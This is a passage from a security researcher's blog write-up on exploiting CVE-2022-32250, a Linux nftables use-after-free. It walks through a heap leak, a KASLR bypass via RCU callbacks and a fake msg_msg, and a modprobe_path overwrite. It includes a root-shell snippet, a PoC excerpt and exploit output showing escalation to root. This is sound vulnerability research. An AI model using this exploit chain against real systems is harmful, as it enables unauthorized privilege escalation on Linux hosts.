  <li>Add another lookup expression (<code class="language-plaintext highlighter-rouge">Obj 2</code>) that looks up into the same set. This would populate <code class="language-plaintext highlighter-rouge">binding-&gt;next</code> of <code class="language-plaintext highlighter-rouge">Obj 1</code>. However <code class="language-plaintext highlighter-rouge">Obj 1</code> got UAF’d so the address of <code class="language-plaintext highlighter-rouge">Obj 2</code> will get written into the data portion of <code class="language-plaintext highlighter-rouge">Fake Obj 1</code> that is of type <code class="language-plaintext highlighter-rouge">user_key_payload</code>.</li>
  <li>Read <code class="language-plaintext highlighter-rouge">Fake Obj 1</code> and leak the address of <code class="language-plaintext highlighter-rouge">Obj 2</code>.</li>
</ul>

<h3 id="defeating-kaslr-">Defeating KASLR <a name="defeatingkaslr"></a></h3>
<p>After leaking a heap address our next goal is to leak a <code class="language-plaintext highlighter-rouge">.text</code> address to defeat <code class="language-plaintext highlighter-rouge">KASLR</code>. 
During this, stage we are going to be leveraging the <a href="https://man7.org/linux/man-pages/man7/mq_overview.7.html">message queue subsystem</a> of the kernel as well as the <a href="https://man7.org/linux/man-pages/man7/keyrings.7.html">in-kernel key management and retention facility</a>.</p>

<h4 id="technique-">Technique <a name="technique"></a></h4>
<p>The technique we are going to use to defeat KASLR is explained in detail in my article <a href="https://ysanatomic.github.io/abusing_rcu_callbacks_to_defeat_kaslr/">Abusing RCU callbacks with a Use-After-Free read to defeat KASLR</a>.</p>

<p>The technique in a nutshell as I introduce it in the article is:</p>
<blockquote>
  <p>The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have a rcu_head as its first member.
If we make a call to update the second object the kernel will call call_rcu which will populate rcu_head-&gt;func(). Then if we can read OOB through the first object into the second object’s rcu_head without sleeping (as to not let the kernel execute rcu_head-&gt;func() which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in rcu_head-&gt;func() therefore defeating KASLR.</p>
</blockquote>

<h4 id="leaking-an-address-">Leaking an address <a name="leaking"></a></h4>
<p>We are going to trigger an allocation of an expression that gets UAF’d (<code class="language-plaintext highlighter-rouge">Object 1</code>). We make a call to the message queue subsystem to create a message queue. This will result in the allocation of a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> object (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>). The <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> has to be allocated at the same location where <code class="language-plaintext highlighter-rouge">Object 1</code> that got UAF’d was allocated.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">posix_msg_tree_node</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">rb_node</span>      <span class="n">rb_node</span><span class="p">;</span> <span class="c1">// of size 0x18 = 24 bytes</span>
    <span class="k">struct</span> <span class="n">list_head</span>    <span class="n">msg_list</span><span class="p">;</span> <span class="c1">// @24 (is 16 bytes)</span>
    <span class="kt">int</span>         <span class="n">priority</span><span class="p">;</span> <span class="c1">// @40</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">rb_node</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span>  <span class="n">__rb_parent_color</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_right</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_left</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))));</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">msg_head</code> of <code class="language-plaintext highlighter-rouge">poxis_msg_tree_node</code> is at offset <code class="language-plaintext highlighter-rouge">24 = 0x18</code> bytes from the start - same as the <code class="language-plaintext highlighter-rouge">list_head</code> of the <code class="language-plaintext highlighter-rouge">nft_set_binding</code> of the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression.</p>
<pre><code class="language-txt">nft_expr that holds nft_lookup | posix_msg_tree_node
====================================================
0x0: *ops                      | _rb_parent_color
0x8: *set                      | *rb_right
0x10: sreg/dreg/invert         | *rb_left
0x18: binding.next             | msg_list.next
0x20: binding.prev             | msg_list.prev
</code></pre>
<p>This would mean that the address of the binding of any new lookup expression will be written at offset <code class="language-plaintext highlighter-rouge">0x18</code> of the <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> which is <code class="language-plaintext highlighter-rouge">msg_list.next</code>. This gives us a primitive with which we can fool the kernel that an object is a message (<code class="language-plaintext highlighter-rouge">struct msg_msg</code>) and fetch it - potentially leaking any addresses and pointers stored in the object.</p>
<blockquote>
  <p>msg_msg gets allocated with GFP_KERNEL_ACCOUNT and therefore couldn’t be in the same slab cache (KMALLOC_NORMAL) as our nft_lookup expressions. However, that doesn’t stop us from fooling the kernel that an object that is in a KMALLOC_NORMAL cache is actually of type msg_msg - which is exactly what we are doing.</p>
</blockquote>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span> <span class="c1">// @16</span>
	<span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>		<span class="cm">/* message text size */</span> <span class="c1">// @24</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @32</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span> <span class="c1">// @40</span>
	<span class="cm">/* the actual message follows immediately */</span>
	<span class="cm">/* the size can be up to 16 bytes while staying under 64 */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Looking at <code class="language-plaintext highlighter-rouge">msg_msg</code> we can see that the <code class="language-plaintext highlighter-rouge">list_head</code> of the object is right at the beginning of the object. This is in contrast to <code class="language-plaintext highlighter-rouge">nft_expr[nft_lookup]</code> where it is at offset 24 bytes. This is significant as the kernel believes that the address at <code class="language-plaintext highlighter-rouge">posix_msg_tree_node.msg_list.next</code> will be that of a <code class="language-plaintext highlighter-rouge">msg_msg</code> object (where the <code class="language-plaintext highlighter-rouge">list_head</code> is at the beginning). Instead, the kernel will find the address of an expression’s <code class="language-plaintext highlighter-rouge">binding</code>. Therefore the kernel will calculate incorrectly where the object starts resulting in an out-of-bounds read. This leaves us with an OOB read primitive that can be used to leak up to 16 bytes from the next slab object satisfying the first condition of the <em>technique</em>.
(Take a look at the table for clarity)</p>

<pre><code class="language-txt">nft_expr[nft_lookup]   | msg_msg
======================================================
0x0: *ops              | 
0x8: *set              |
0x10: sreg/dreg/invert | 
0x18: binding.next     | m_list.next
0x20: binding.prev     | m_list.prev
0x28: ...              | m_type
0x30: ...              | m_ts
0x38: ...              | *next
======== Going outside the 64 byte slab object =======
0x40:                  | *security
0x48:                  | msg[0]
0x50:                  | msg[1]
</code></pre>

<p>As we already established: the second lookup expression (let it be called <code class="language-plaintext highlighter-rouge">Object 2</code>) we allocate will be treated as the first message in a message queue. However, to have a successful read via the message queue system - we need to be able to set the parameters of <code class="language-plaintext highlighter-rouge">msg_msg</code>. In order to do that we would need to UAF <code class="language-plaintext highlighter-rouge">Object 2</code> and allocate another object in its place (<code class="language-plaintext highlighter-rouge">Fake Object 2</code>).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">user_key_payload</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">rcu_head</span>	<span class="n">rcu</span><span class="p">;</span>		<span class="cm">/* RCU destructor */</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>	<span class="n">datalen</span><span class="p">;</span>	<span class="cm">/* length of this data */</span>
	<span class="kt">char</span>		<span class="n">data</span><span class="p">[]</span> <span class="n">__aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">));</span> <span class="cm">/* actual data */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The type of <code class="language-plaintext highlighter-rouge">Fake Object 2</code> will be once again <code class="language-plaintext highlighter-rouge">user_key_payload</code> as it gets allocated with  <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> and we can use it to write the parameters of the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> by writing to <code class="language-plaintext highlighter-rouge">data</code>. This way we can set the <code class="language-plaintext highlighter-rouge">m_type</code> and <code class="language-plaintext highlighter-rouge">m_ts</code> of the fake message (we also have to write valid pointers into <code class="language-plaintext highlighter-rouge">m_list-&gt;next</code> and <code class="language-plaintext highlighter-rouge">mlist-&gt;prev</code>).</p>

<pre><code class="language-txt">nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
======== End of Object 2 ; Object 3 follows ==========
0x8:                   |                  | *security
0x10:                  |                  | msg[0]
0x18:                  |                  | msg[1]
</code></pre>
<p>Here the first column represents the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression that gets UAF’d. The second column is the object that gets allocated over the object that got UAF’d while the third column shows how the kernel is going to treat the object (as a <code class="language-plaintext highlighter-rouge">msg_msg</code> object that is offset by <code class="language-plaintext highlighter-rouge">24 = 0x18</code> bytes).</p>

<p>Whenever a call to fetch a message is made the function <code class="language-plaintext highlighter-rouge">do_mq_timedreceive</code> gets called. At the end of the function as the <code class="language-plaintext highlighter-rouge">msg_msg</code> object is about to get freed a call to free <code class="language-plaintext highlighter-rouge">msg_msg-&gt;security</code> is made as a security measure - so in order for the message fetch to succeed there must be a valid heap address at offset <code class="language-plaintext highlighter-rouge">40=0x28</code> bytes. Therefore we need to take measures in ensuring that there is indeed a heap address at that location. We must also note that due to the nature of the OOB read the <code class="language-plaintext highlighter-rouge">*security</code> pointer would be at offset <code class="language-plaintext highlighter-rouge">64=0x40</code> bytes - right at the beginning of the next slab object as you can see above (this is due to the 24-byte offset read).</p>

<p>We are going to leak KASLR through the object we allocate right under <code class="language-plaintext highlighter-rouge">Object 2 / Fake Object 2</code>. A perfect object for this task is once again… <code class="language-plaintext highlighter-rouge">user_key_payload</code> - the main character of our write-up. 
The first member of <code class="language-plaintext highlighter-rouge">user_key_payload</code> is a <code class="language-plaintext highlighter-rouge">rcu_head/callback_head</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">callback_head</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">func</span><span class="p">)(</span><span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">head</span><span class="p">);</span> <span class="c1">// @8 rcu_head-&gt;func </span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))));</span>
<span class="cp">#define rcu_head callback_head
</span></code></pre></div></div>
<p>The first member of the <code class="language-plaintext highlighter-rouge">callback_head</code> is a pointer (<code class="language-plaintext highlighter-rouge">callback_head-&gt;next</code>) that will be treated as <code class="language-plaintext highlighter-rouge">msg_msg-&gt;security</code> and the second member is a function pointer that will overlap with <code class="language-plaintext highlighter-rouge">msg[0]</code>. Therefore if we make a call to read the message we will be able to read that function pointer and leak KASLR.</p>

<p>However, there is an issue: both <code class="language-plaintext highlighter-rouge">callback_head-&gt;next</code> and <code class="language-plaintext highlighter-rouge">callback_head-&gt;func</code> will be <em>null</em> by default. In order to populate them we must make a call to change the payload (<code class="language-plaintext highlighter-rouge">Object 3</code>). This is due to the way RCU callbacks work - when a call is made to change an RCU-protected object <code class="language-plaintext highlighter-rouge">call_rcu</code> is invoked.</p>
<blockquote>
  <p>The call_rcu() API is a callback form of synchronize_rcu().  Instead of blocking, it registers a function and argument which are invoked after all ongoing RCU read-side critical sections have completed. This callback variant is particularly useful in situations where it is illegal to block or where update-side performance is critically important.</p>
</blockquote>

<p>The function at <code class="language-plaintext highlighter-rouge">callback_head-&gt;func</code> will be executed by the kernel when it is safe to do so. In the case of updating a <code class="language-plaintext highlighter-rouge">user_key_payload</code> the callback function will be <code class="language-plaintext highlighter-rouge">user_free_payload_rcu</code> which will free and zero out <code class="language-plaintext highlighter-rouge">Object 3</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">user_free_payload_rcu</span><span class="p">(</span><span class="k">struct</span> <span class="n">rcu_head</span> <span class="o">*</span><span class="n">head</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="o">*</span><span class="n">payload</span><span class="p">;</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="n">container_of</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="k">struct</span> <span class="n">user_key_payload</span><span class="p">,</span> <span class="n">rcu</span><span class="p">);</span>
	<span class="n">kfree_sensitive</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>So leaking <code class="language-plaintext highlighter-rouge">callback_head-&gt;func</code> is essentially a race against the kernel - trying to read it and leak it before the kernel zeroes it out.</p>

<p>I go over the technique in more detail in my article <a href="https://ysanatomic.github.io/abusing_rcu_callbacks_to_defeat_kaslr/">Abusing RCU callbacks with a Use-After-Free read to defeat KASLR</a>.</p>

<h4 id="summarizing-the-kaslr-leak-process-">Summarizing the KASLR leak process: <a name="summarizingkaslr"></a></h4>
<ol>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression (<code class="language-plaintext highlighter-rouge">Object 1</code>) such that it causes a UAF.</li>
  <li>Initiate a message queue in order to allocate a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>) at the location of <code class="language-plaintext highlighter-rouge">Object 1</code>.</li>
  <li>Spray <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects and then randomly free a few to create a bunch of gaps in the cache so <code class="language-plaintext highlighter-rouge">Object 2</code> gets allocated in between them.</li>
  <li>Add a new <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression (<code class="language-plaintext highlighter-rouge">Object 2</code>) such that it causes a UAF. The address of this expression’s <code class="language-plaintext highlighter-rouge">binding</code> (which’s address is <code class="language-plaintext highlighter-rouge">[Object 2] + 0x18</code>) will be written into the <code class="language-plaintext highlighter-rouge">msg_list-&gt;next</code> of the <code class="language-plaintext highlighter-rouge">poxis_msg_tree_node</code>. Now if a message is fetched from the message queue the kernel will target <code class="language-plaintext highlighter-rouge">[Object 2] + 0x18</code> to get the message (<code class="language-plaintext highlighter-rouge">msg_msg</code>). We also hope that this object would have been allocated such that the object immediately below it is a <code class="language-plaintext highlighter-rouge">user_key_payload</code> (and this is why we spray a lot of them in step 3).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">user_key_payload</code> (<code class="language-plaintext highlighter-rouge">Fake Object 2</code>) at the location of <code class="language-plaintext highlighter-rouge">Object 2</code>. Write into the payload the parameter values we want our fake <code class="language-plaintext highlighter-rouge">msg_msg</code> at <code class="language-plaintext highlighter-rouge">[Object 2] + 0x18</code> to have. We write values for <code class="language-plaintext highlighter-rouge">m_list-&gt;next</code>, <code class="language-plaintext highlighter-rouge">m_list-&gt;prev</code>, <code class="language-plaintext highlighter-rouge">m_type</code> and <code class="language-plaintext highlighter-rouge">m_ts</code>.</li>
  <li>Mass update all the <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects to populate the <code class="language-plaintext highlighter-rouge">rcu_head</code> members.</li>
  <li>Make a call to fetch the first message from a message queue. This should leak a kernel address, defeating KASLR (if we won the race against the kernel to leak <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func</code> before it got zeroed out).</li>
</ol>

<h3 id="escalating-via-a-modprobe_path-overwrite-">Escalating via a modprobe_path overwrite <a name="escalating"></a></h3>
<p>An easy way to achieve Local Priviliege Escalation is by overwriting the <code class="language-plaintext highlighter-rouge">modprobe_path</code> of the kernel.
<code class="language-plaintext highlighter-rouge">modprobe</code> is used to load kernel modules from userspace. A common usage of it is to load the necessary module needed to execute a binary with an uncommon binary header. 
The location of <code class="language-plaintext highlighter-rouge">modprobe</code> is stored in the <code class="language-plaintext highlighter-rouge">modprobe_path</code> symbol. It is possible for us to overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> as it is stored in the <code class="language-plaintext highlighter-rouge">.data</code> segment (which is read/write and variables stored in there can be altered at run time).</p>

<h4 id="method-of-exploitation--1">Method of Exploitation <a name="escalatingmethod"></a></h4>
<p>Our goal is to write <code class="language-plaintext highlighter-rouge">modprobe_path</code> to an executable that we control - let’s call that <code class="language-plaintext highlighter-rouge">fake_modprobe</code>.</p>

<p>As we already established <code class="language-plaintext highlighter-rouge">modprobe</code> is executed in order to load a kernel module needed to handle the execution of a binary of an uncommon type. We can set up a <code class="language-plaintext highlighter-rouge">trigger</code> binary with an unknown binary header which when executed will force the kernel to execute <code class="language-plaintext highlighter-rouge">modprobe</code> in order to attempt to load an appropriate kernel module to handle <code class="language-plaintext highlighter-rouge">trigger</code>. But instead of <code class="language-plaintext highlighter-rouge">modprobe</code> being run, <code class="language-plaintext highlighter-rouge">fake_modprobe</code> will be executed with kernel privileges.</p>

<p>The <code class="language-plaintext highlighter-rouge">fake_modprobe</code> executable can be a simple script that changes the ownership of a <code class="language-plaintext highlighter-rouge">get_shell</code> executable to <code class="language-plaintext highlighter-rouge">root</code> and sets its SUID and GUID bits. In this case, <code class="language-plaintext highlighter-rouge">get_shell</code> just does:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setuid(0);
setgid(0);
system("/bin/sh");
</code></pre></div></div>
<p>The process summarized:</p>
<ul>
  <li>Overwrite <code class="language-plaintext highlighter-rouge">modprobe_path</code> to <code class="language-plaintext highlighter-rouge">/path/to/fake_modprobe</code></li>
  <li>Execute a <code class="language-plaintext highlighter-rouge">trigger</code> binary with an unknown binary header.</li>
  <li>The kernel executes <code class="language-plaintext highlighter-rouge">fake_modprobe</code> in an attempt to load the needed modules to execute <code class="language-plaintext highlighter-rouge">trigger</code> which instead changes the ownership and permissions of <code class="language-plaintext highlighter-rouge">get_shell</code>.</li>
  <li>Execute <code class="language-plaintext highlighter-rouge">get_shell</code> to escalate privileges.</li>
</ul>

<h4 id="overwriting-modprobe_path-">Overwriting modprobe_path <a name="overwritingmodprobe"></a></h4>
<p>When a call to fetch a message is made the function <code class="language-plaintext highlighter-rouge">do_mq_timedreceive</code> gets executed which itself makes a call to <code class="language-plaintext highlighter-rouge">msg_get</code> to get the highest priority message from a queue.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="nf">msg_get</span><span class="p">(</span><span class="k">struct</span> <span class="n">mqueue_inode_info</span> <span class="o">*</span><span class="n">info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">parent</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">posix_msg_tree_node</span> <span class="o">*</span><span class="n">leaf</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span>

<span class="nl">try_again:</span>
	<span class="cm">/*
	 * During insert, low priorities go to the left and high to the
	 * right.  On receive, we want the highest priorities first, so
	 * walk all the way to the right.
	 */</span>
	<span class="n">parent</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">msg_tree_rightmost</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">parent</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">info</span><span class="o">-&gt;</span><span class="n">attr</span><span class="p">.</span><span class="n">mq_curmsgs</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">pr_warn_once</span><span class="p">(</span><span class="s">"Inconsistency in POSIX message queue, "</span>
				     <span class="s">"no tree element, but supposedly messages "</span>
				     <span class="s">"should exist!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
			<span class="n">info</span><span class="o">-&gt;</span><span class="n">attr</span><span class="p">.</span><span class="n">mq_curmsgs</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="n">leaf</span> <span class="o">=</span> <span class="n">rb_entry</span><span class="p">(</span><span class="n">parent</span><span class="p">,</span> <span class="k">struct</span> <span class="n">posix_msg_tree_node</span><span class="p">,</span> <span class="n">rb_node</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">leaf</span><span class="o">-&gt;</span><span class="n">msg_list</span><span class="p">)))</span> <span class="p">{</span>
		<span class="n">pr_warn_once</span><span class="p">(</span><span class="s">"Inconsistency in POSIX message queue, "</span>
			     <span class="s">"empty leaf node but we haven't implemented "</span>
			     <span class="s">"lazy leaf delete!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="n">msg_tree_erase</span><span class="p">(</span><span class="n">leaf</span><span class="p">,</span> <span class="n">info</span><span class="p">);</span>
		<span class="k">goto</span> <span class="n">try_again</span><span class="p">;</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">msg</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">leaf</span><span class="o">-&gt;</span><span class="n">msg_list</span><span class="p">,</span>
				       <span class="k">struct</span> <span class="n">msg_msg</span><span class="p">,</span> <span class="n">m_list</span><span class="p">);</span>
		<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">m_list</span><span class="p">);</span> <span class="c1">// [1] &lt;---------------------</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">leaf</span><span class="o">-&gt;</span><span class="n">msg_list</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">msg_tree_erase</span><span class="p">(</span><span class="n">leaf</span><span class="p">,</span> <span class="n">info</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="n">info</span><span class="o">-&gt;</span><span class="n">attr</span><span class="p">.</span><span class="n">mq_curmsgs</span><span class="o">--</span><span class="p">;</span>
	<span class="n">info</span><span class="o">-&gt;</span><span class="n">qsize</span> <span class="o">-=</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">m_ts</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">msg</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that <code class="language-plaintext highlighter-rouge">list_del</code> is used to remove the message (<code class="language-plaintext highlighter-rouge">msg_msg</code>) from the linked list of messages in the queue.</p>

<p><code class="language-plaintext highlighter-rouge">list_del</code> deletes a list entry by making the prev/next entries point to each other.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">__list_del</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span> <span class="n">prev</span><span class="p">,</span> <span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span> <span class="n">next</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">=</span> <span class="n">prev</span><span class="p">;</span> <span class="c1">// [1]</span>
	<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">,</span> <span class="n">next</span><span class="p">);</span> <span class="c1">// [2]</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The instruction at <code class="language-plaintext highlighter-rouge">[1]</code> will write <code class="language-plaintext highlighter-rouge">prev</code> into <code class="language-plaintext highlighter-rouge">next+0x8</code> while the instruction at <code class="language-plaintext highlighter-rouge">[2]</code> will write <code class="language-plaintext highlighter-rouge">next</code> into <code class="language-plaintext highlighter-rouge">prev</code>.</p>

<p>We introduced in the <strong>KASLR bypass</strong> section of this write-up a way to fool the kernel that an object is a <code class="language-plaintext highlighter-rouge">msg_msg</code> - with the ability to set the members of the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> to the values we want.</p>
<pre><code class="language-txt">nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
=====================================================
0x8:                   |                  | *security
0x10:                  |                  | msg[0]
0x18:                  |                  | msg[1]
</code></pre>
<p>We can use a <code class="language-plaintext highlighter-rouge">user_key_payload</code> object to set up the fake <code class="language-plaintext highlighter-rouge">msg_msg</code> exactly how we want it - including setting <code class="language-plaintext highlighter-rouge">m_list.next</code> and <code class="language-plaintext highlighter-rouge">m_list.prev</code> to any value we want. We can therefore take advantage of the <code class="language-plaintext highlighter-rouge">list_del</code> function - letting it write to <code class="language-plaintext highlighter-rouge">modprobe_path</code> for us. To do that we would need to set <code class="language-plaintext highlighter-rouge">m_list.prev</code> to the value we want <code class="language-plaintext highlighter-rouge">modprobe_path</code> to hold and set <code class="language-plaintext highlighter-rouge">m_list.next</code> to <code class="language-plaintext highlighter-rouge">modprobe_path - 0x7</code> (as it writes <code class="language-plaintext highlighter-rouge">prev</code> into <code class="language-plaintext highlighter-rouge">next+0x8</code> and we want to counteract this offsetting while still leaving the <code class="language-plaintext highlighter-rouge">/</code> at the beginning of the existing <code class="language-plaintext highlighter-rouge">modprobe_path</code>).</p>

<p>An interesting caveat though is that the value we write to <code class="language-plaintext highlighter-rouge">m_list.prev</code> (which is going to serve as the path written in <code class="language-plaintext highlighter-rouge">modprobe_path</code>) must be a valid address at which the kernel has to be able to write -  this however is not a problem as we leaked the heap base earlier and we can make such an address-like path that is valid.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// excerpt from my Proof-of-Concept</span>
<span class="kt">uint64_t</span> <span class="n">modprobe_path</span> <span class="o">=</span> <span class="n">heap_base</span> <span class="o">+</span> <span class="mh">0x2f706d74</span><span class="p">;</span> <span class="c1">// 0x2f706d74 = tmp/ (but little endian)</span>
</code></pre></div></div>
<p>This would result into <code class="language-plaintext highlighter-rouge">modprobe_path</code> being changed in <code class="language-plaintext highlighter-rouge">/tmp/&lt;2 bytes of entropy&gt;\xff\xff&lt;rest of original modprobe_path&gt;</code> (the 2 bytes of entropy here belong to the heap base we leaked).</p>

<p>Now it is a matter of placing the fake modprobe at this path and executing the <code class="language-plaintext highlighter-rouge">trigger</code> binary.</p>

<h2 id="proof-of-concept-">Proof-of-Concept <a name="poc"></a></h2>
<p>The PoC is available at <a href="https://github.com/ysanatomic/CVE-2022-32250-LPE">https://github.com/ysanatomic/CVE-2022-32250-LPE</a>.</p>

<pre><code class="language-txt"># ./exploit
[*] CVE-2022-32250 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

uid=0(root) gid=0(root) groups=0(root)

[+] STAGE 1: Heap leak
[*] Socket is opened.
[*] Table table1 created.
[*] Socket is opened.
[*] Table table2 created.
[*] Socket is opened.
[*] Table table3 created.
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&amp;] heap_addr: 0xffff91d97f89f398
[&amp;] heap_base: 0xffff91d900000000

[+] STAGE 2: KASLR bypass
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&amp;] kaddr: 0xffffffff9f54bef0
[&amp;] kbase: 0xffffffff9f000000

[+] STAGE 3: modprobe_path overwrite
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created

[*] STAGE 4: Escalation
[*] Setting up the fake modprobe...
[*] modprobe_path: /tmp/ّprobe
[*] Setting up the shell...
[*] Triggering the modprobe...
[*] Executing shell...
/ #
</code></pre>

<h2 id="closing-remarks-">Closing Remarks <a name="closing"></a></h2>
<p>Analysing and Exploiting this vulnerability was lots of fun. Initially, I planned to do everything from analysing it to making the exploit live on stream but I started doing more and more off-stream and then I just finished it up off-stream. I might make one last stream/video where I go over the final exploit in detail.</p>

<p>Took me some time to sit down and finish up the write-up - but better late than never.</p>

